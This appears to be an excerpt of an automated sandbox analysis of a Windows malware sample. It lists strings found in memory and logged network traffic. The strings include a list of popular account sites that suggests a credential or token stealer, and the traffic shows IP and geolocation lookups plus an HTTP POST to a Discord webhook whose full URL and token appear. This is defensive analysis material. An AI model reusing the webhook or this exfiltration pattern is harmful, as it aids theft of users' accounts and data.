Source: KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127ED7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127ED3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gmail.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.275835925.0000022126D48000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287339683.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287289029.00000221275C5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.289846670.0000022126D4F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297223461.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291026470.0000022126D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: KzqQe0QtRd.exe, 00000001.00000003.287339683.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297223461.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
Source: KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hbo.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hotmail.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.292829222.0000022127DF2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275364164.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277869867.0000022127DEE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: KzqQe0QtRd.exe, 00000001.00000003.291026470.0000022126D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
Source: KzqQe0QtRd.exe, 00000001.00000003.282819422.0000022127E4C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292085021.0000022127372000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/code%20style-black-000000.svg
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2022-informational
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=white
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/discord/803025117553754132
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/setuptools.svg
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/setuptools.svg
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/readthedocs/setuptools/latest.svg
Source: KzqQe0QtRd.exe, 00000001.00000002.297531973.0000022127030000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276647827.0000022127C7C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288518670.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279646443.0000022127C82000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291906788.0000022127CA0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277230606.0000022127C96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286608073.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279646443.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275885170.0000022127C84000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: KzqQe0QtRd.exe, 00000001.00000002.298114495.0000022127381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://minecraft.net)
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://netflix.com))
Source: KzqQe0QtRd.exe, 00000001.00000003.289149538.00000221274B7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275987761.000002212748E000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276055923.00000221274A4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279714208.00000221274B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://origin.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com)z&
Source: KzqQe0QtRd.exe, 00000001.00000003.288518670.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291906788.0000022127CA0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277230606.0000022127C96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286608073.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279646443.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275885170.0000022127C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/installing/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paypal.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.217980895.0000022126E29000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217610498.0000022126E29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://playstation.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pornhub.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/pypa/setuptools/main/docs/images/banner-640x320.svg
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)z
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/
Source: KzqQe0QtRd.exe, 00000001.00000003.280107530.0000022126BD5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277774285.0000022126BC8000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295601281.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279389580.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288409865.0000022126BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/stable/history.html
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.294548460.0000022127475000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276727923.000002212746B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286704566.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287484083.0000022126EAE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280811119.0000022126E07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288482138.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279135679.0000022126E04000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126E05000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://superfurrycdn.nl/copy/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)z
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/github/pypa/setuptools?style=flat
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=readme
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-setuptools?utm_source=pypi-setuptools&utm_medium=referral
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.275180849.0000022127D72000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274367842.0000022127D72000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279856273.0000022127D72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: KzqQe0QtRd.exe, 00000001.00000003.291291027.0000022127FBB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295871177.0000022127E93000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287859359.0000022127E92000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291517549.0000022127FBE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274505409.0000022127E8F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275572297.0000022127E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.275835925.0000022126D48000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287289029.00000221275C5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.289846670.0000022126D4F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291026470.0000022126D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uber.com)z
Source: KzqQe0QtRd.exe, 00000001.00000002.297603053.0000022127150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
Source: KzqQe0QtRd.exe, 00000001.00000003.287950087.0000022126B4A000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277890620.0000022126B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
Source: KzqQe0QtRd.exe, 00000001.00000003.295443472.0000022127FAE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292127872.0000022127FA9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275288125.0000022127F91000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280797584.0000022127F96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: KzqQe0QtRd.exe, 00000000.00000003.211083980.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
Source: KzqQe0QtRd.exe, 00000001.00000002.298114495.0000022127381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: KzqQe0QtRd.exe, 00000001.00000002.296609743.00000221266B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: KzqQe0QtRd.exe, 00000001.00000003.294516751.00000221282E5000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274712221.00000221282DB000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275269484.0000022128148000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277019974.00000221282E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.287339683.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297223461.0000022126DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)z
Source: unknownHTTP traffic detected: POST /api/webhooks/1145292889375641651/LiLYNKzxiXzK4I7mlokWLchk9nrkUSyIf0sFNc2iJ59Y-dUSvo_8s9RlN3C733kDbhnM HTTP/1.1Accept-Encoding: identityContent-Length: 443Host: ptb.discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: unknownDNS traffic detected: queries for: api.ipify.org
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET /jsonp/191.101.61.19 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET /jsonp/191.101.61.19 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET /jsonp/191.101.61.19 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: api.ipify.orgUser-Agent: Python-urllib/3.11Connection: close
Source: global trafficHTTP traffic detected: GET /jsonp/191.101.61.19 HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701284E500_2_00007FF701284E50
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701285D9C0_2_00007FF701285D9C
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012767440_2_00007FF701276744
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012667A00_2_00007FF7012667A0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF70127FA380_2_00007FF70127FA38
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012709D00_2_00007FF7012709D0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012831FC0_2_00007FF7012831FC
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012711F00_2_00007FF7012711F0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012809E40_2_00007FF7012809E4
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF70127CC340_2_00007FF70127CC34
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701272C340_2_00007FF701272C34
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701261B900_2_00007FF701261B90
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701270BD40_2_00007FF701270BD4
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701278BD00_2_00007FF701278BD0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701288B980_2_00007FF701288B98
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012713F40_2_00007FF7012713F4
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701271EA00_2_00007FF701271EA0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF70127FA380_2_00007FF70127FA38
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012765900_2_00007FF701276590
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701282D600_2_00007FF701282D60
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701270DE00_2_00007FF701270DE0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012858500_2_00007FF701285850
